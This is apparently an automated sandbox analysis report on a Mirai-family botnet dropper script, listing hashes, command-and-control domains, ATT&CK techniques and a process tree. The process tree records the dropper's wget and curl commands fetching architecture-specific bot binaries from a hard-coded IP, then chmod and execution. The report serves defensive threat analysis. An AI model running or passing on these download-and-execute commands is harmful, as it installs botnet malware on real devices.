mirai | 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa

Analysis

max time kernel
26s
max time network
30s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
30-12-2024 02:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh
Size

2KB
MD5

0569b09a5951d5fe444efa1892b87687
SHA1

0d3df40a37ec718be33d83c1c9a962e982a51d17
SHA256

6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa
SHA512

fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d

Score

10^/10

mirai condi antivm botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

CONDI

botnet.tfmobile.store

report.tfmobile.store

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 7 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
694	chmod
712	chmod
732	chmod
752	chmod
764	chmod
785	chmod
805	chmod

Executes dropped EXE 7 IoCs

ioc	pid	Process
/tmp/robben	695	robben
/tmp/robben	714	robben
/tmp/robben	733	robben
/tmp/robben	753	robben
/tmp/robben	765	robben
/tmp/robben	786	robben
/tmp/robben	806	robben

Checks CPU configuration 1 TTPs 7 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 14 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
697	wget
700	curl
711	cat

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/botx.i468	curl
File opened for modification	/tmp/botx.mpsl	curl
File opened for modification	/tmp/botx.arm4	curl
File opened for modification	/tmp/botx.x86	wget
File opened for modification	/tmp/botx.mips	wget
File opened for modification	/tmp/botx.mips	curl
File opened for modification	/tmp/botx.x86_64	curl
File opened for modification	/tmp/botx.i686	curl
File opened for modification	/tmp/botx.mpsl	wget
File opened for modification	/tmp/botx.x86	curl
File opened for modification	/tmp/robben	6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh

/tmp/6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh
/tmp/6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh
1⤵
- Writes file to tmp directory
PID:661
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.x86
  2⤵
  - Writes file to tmp directory
  PID:669
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:687
- /bin/cat
  cat botx.x86
  2⤵
  PID:693
- /bin/chmod
  chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.x86 robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-kaAtTB
  2⤵
  - File and Directory Permissions Modification
  PID:694
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:695
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:697
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:700
- /bin/cat
  cat botx.mips
  2⤵
  - System Network Configuration Discovery
  PID:711
- /bin/chmod
  chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.mips botx.x86 robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-kaAtTB
  2⤵
  - File and Directory Permissions Modification
  PID:712
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:714
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.x86_64
  2⤵
  PID:717
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:723
- /bin/cat
  cat botx.x86_64
  2⤵
  PID:730
- /bin/chmod
  chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.mips botx.x86 botx.x86_64 robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-kaAtTB
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:733
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.i468
  2⤵
  PID:735
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.i468
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:741
- /bin/cat
  cat botx.i468
  2⤵
  PID:750
- /bin/chmod
  chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.i468 botx.mips botx.x86 botx.x86_64 robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-kaAtTB
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:753
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.i686
  2⤵
  PID:755
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:761
- /bin/cat
  cat botx.i686
  2⤵
  PID:763
- /bin/chmod
  chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-kaAtTB
  2⤵
  - File and Directory Permissions Modification
  PID:764
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:765
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.mpsl
  2⤵
  - Writes file to tmp directory
  PID:766
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:771
- /bin/cat
  cat botx.mpsl
  2⤵
  PID:783
- /bin/chmod
  chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-kaAtTB
  2⤵
  - File and Directory Permissions Modification
  PID:785
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:786
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.arm4
  2⤵
  PID:788
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.arm4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:795
- /bin/cat
  cat botx.arm4
  2⤵
  PID:803
- /bin/chmod
  chmod +x 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-kaAtTB
  2⤵
  - File and Directory Permissions Modification
  PID:805
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:806
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.arm5
  2⤵
  PID:807

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/botx.x86

Filesize
50KB

MD5
1092f7846a6ca7a5e92ece0ea93ff82e

SHA1
140fd3e84c49d382e6b0f9a40730d1cd465f8347

SHA256
a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2

SHA512
11ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba

Download Submit
/tmp/robben

Filesize
71KB

MD5
b5aeba1a09f5198a71db73371f6e01b6

SHA1
246b98370fdf429e94ab4ca087828acabbbebd9c

SHA256
7a81d936e21b859c70565eddf8e6e50658f6dff077a53adb0ec3cf313ce9f71f

SHA512
68db247b59d9fe3e030d56e48f2032c6e0d4bf203aef4e850da7dcda7185e60370fa577f2b97f9b6026b0599ae35ecca9fb48c8ace300d9820fb6a16b5722c57

Download Submit
/tmp/robben

Filesize
215B

MD5
0797a2600ddc5e8572bfb37b8af0aa29

SHA1
4f7fc88100b7896f12d953c0b7dd18f516e573d1

SHA256
1f1fe3f0ef586643c0c73185c744b40b31c4241a90a30a0880c866dbc04fe538

SHA512
0298488cf573edce6fa015e17439f3ed66285dfc5b908017e95c3a71f44f1f1949a64f69cb1ac8b64cb9e8c28c15ca0b35e8cd04265ffcae3f736f7151ef6dec

Download Submit
/tmp/robben

Filesize
213B

MD5
51b807212d0b7e7a9a37e4536b2d0133

SHA1
f130ad0c7f78e1a99f76ed36c003cb5cac871843

SHA256
94bf03444a7262f62fc6b9ca294b0cdb3bcf96d03fe1d5bdf286ddea26759c11

SHA512
a86a291fbeeeae74466791679a9a22e9224a03e3a625676d678e9a11ca887c792ba8496dbac6e40fd3b289258698d7c5b882f33c89630532f7570de16bffd2e4

Download Submit
/tmp/robben

Filesize
213B

MD5
033d284ddf80a0d366e8d7543fc26df4

SHA1
fe4845a1d864f47c5d0e330a8fd9eaf7759aa9f5

SHA256
f45f2580c1af1c5c96a1aa6a312b2079c21c1b929f418b91d9bf323a57f89aa8

SHA512
e58e6f5200b6a9022c93da8d13a1a2bf2b50ad6fd5f1144e9979ae66adf9a441a796adebdd9cef942abeadb8ed42a5242c24dca330cb77730269233ff8839fb2

Download Submit
/tmp/robben

Filesize
71KB

MD5
6f8bc0cec3ed3203180e24c08e19097f

SHA1
11d154393db976a24fcd69ba381a8c486658c76d

SHA256
eafaab45026e821329f549208ec70b5707ffb7e8d9645d55e51cc4deec1e087f

SHA512
e5206fd4b8941293d1a262b0be1c525ee1569c9468db8c43813e308b14dc5f1efd365c8ca2c7e7c62b023f772285f54dd193e6cb9c2dcc93df08c7a80de0d2e0

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads